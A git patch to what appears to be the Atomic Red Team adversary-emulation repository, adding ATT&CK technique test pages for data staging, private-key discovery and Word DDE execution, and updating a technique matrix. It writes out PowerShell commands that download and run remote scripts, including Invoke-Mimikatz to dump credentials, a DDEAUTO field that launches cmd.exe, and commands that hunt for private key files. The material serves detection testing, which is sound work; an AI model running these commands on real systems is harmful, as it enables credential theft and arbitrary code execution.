From 8ba1dc8a194c602c2d41d10461b99e657e929fec Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Thu, 8 Mar 2018 14:26:18 -0600 Subject: [PATCH] Technique Adds Private Keys - Find them DDE - Reference: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ Data Staged --- Windows/Collection/Data_Staged.md | 9 +++++++++ Windows/Credential_Access/Private_Keys.md | 16 ++++++++++++++++ Windows/Execution/Dynamic_Data_Exchange.md | 19 +++++++++++++++++++ Windows/Execution/PowerShell.md | 2 +- Windows/README.md | 6 +++--- 5 files changed, 48 insertions(+), 4 deletions(-) create mode 100644 Windows/Collection/Data_Staged.md create mode 100644 Windows/Credential_Access/Private_Keys.md create mode 100644 Windows/Execution/Dynamic_Data_Exchange.md diff --git a/Windows/Collection/Data_Staged.md b/Windows/Collection/Data_Staged.md new file mode 100644 index 00000000..3a69b731 --- /dev/null +++ b/Windows/Collection/Data_Staged.md @@ -0,0 +1,9 @@ +# Data Staged + +MITRE ATT&CK Technique: [T1074](https://attack.mitre.org/wiki/Technique/T1074) + +### Stage data from Discovery.bat + +Input: + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log diff --git a/Windows/Credential_Access/Private_Keys.md b/Windows/Credential_Access/Private_Keys.md new file mode 100644 index 00000000..4d8537e7 --- /dev/null +++ b/Windows/Credential_Access/Private_Keys.md @@ -0,0 +1,16 @@ +# Private Keys + +MITRE ATT&CK Technique: [T1145](https://attack.mitre.org/wiki/Technique/T1145) + +File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + +Input: + +Make some files: + +echo "ATOMICREDTEAM" > %windir%\cert.key + dir C:\Users\(username)\.ssh\ + +Find files: + + dir c:\ /b /s .key | findstr /e .key diff --git a/Windows/Execution/Dynamic_Data_Exchange.md b/Windows/Execution/Dynamic_Data_Exchange.md new file mode 100644 index 00000000..0e7e4c8c --- /dev/null +++ b/Windows/Execution/Dynamic_Data_Exchange.md @@ -0,0 +1,19 @@ +# Dynamic Data Exchange + +MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173) + + +### Microsoft Word + +Open, + +Insert tab -> Quick Parts -> Field + +Choose = (Formula) and click ok. + +After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. + +The Field Code should now be displayed, change it to Contain the following: + + + {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" } diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md index f59eccf5..54085c5b 100644 --- a/Windows/Execution/PowerShell.md +++ b/Windows/Execution/PowerShell.md @@ -4,7 +4,7 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086) ### Download Mimikatz and Dump credentials - powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" ### Download and Execute BloodHound diff --git a/Windows/README.md b/Windows/README.md index 47528df1..4b49bc23 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -3,17 +3,17 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | -| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | +| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md) | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | | [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | [Logon Scripts](Persistence/Logon_Scripts.md) | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | -| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | | [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | -| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | +| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | [Private Keys](Credential_Access/Private_Keys.md) | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | | External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption | | File System Permissions Weakness | Path Interception | File System Logical Offsets | Two-Factor Authentication Interception | System Network Connections Discovery | [Windows Admin Shares](Lateral_Movement/Windows_Admin_Shares.md) | Scripting | | | Remote File Copy | | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | Port Monitors | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | [Windows Remote Management](Lateral_Movement/Windows_Remote_Management.md) | Service Execution | | | Standard Application Layer Protocol |